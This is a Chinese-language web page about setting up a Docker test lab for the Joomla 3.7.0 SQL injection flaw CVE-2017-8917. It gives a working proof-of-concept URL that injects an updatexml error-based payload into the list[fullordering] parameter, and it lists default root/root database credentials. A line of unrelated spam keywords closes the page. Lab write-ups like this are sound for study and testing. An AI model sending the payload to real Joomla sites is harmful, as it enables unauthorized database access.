<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞環境

    Path joomla/CVE-2017-8917

    測試環境

    編譯及啟動測試環境:

    docker-compose up -d

    啟動后訪問http://your-ip:8080即可看到Joomla的安裝界面,當前環境的數據庫信息為:

    • 數據庫地址:mysql:3306
    • 用戶:root
    • 密碼:root
    • 數據庫名:joomla

    填入上述信息,正常安裝即可。

    POC測試

    安裝完成后,訪問http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到報錯信息:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类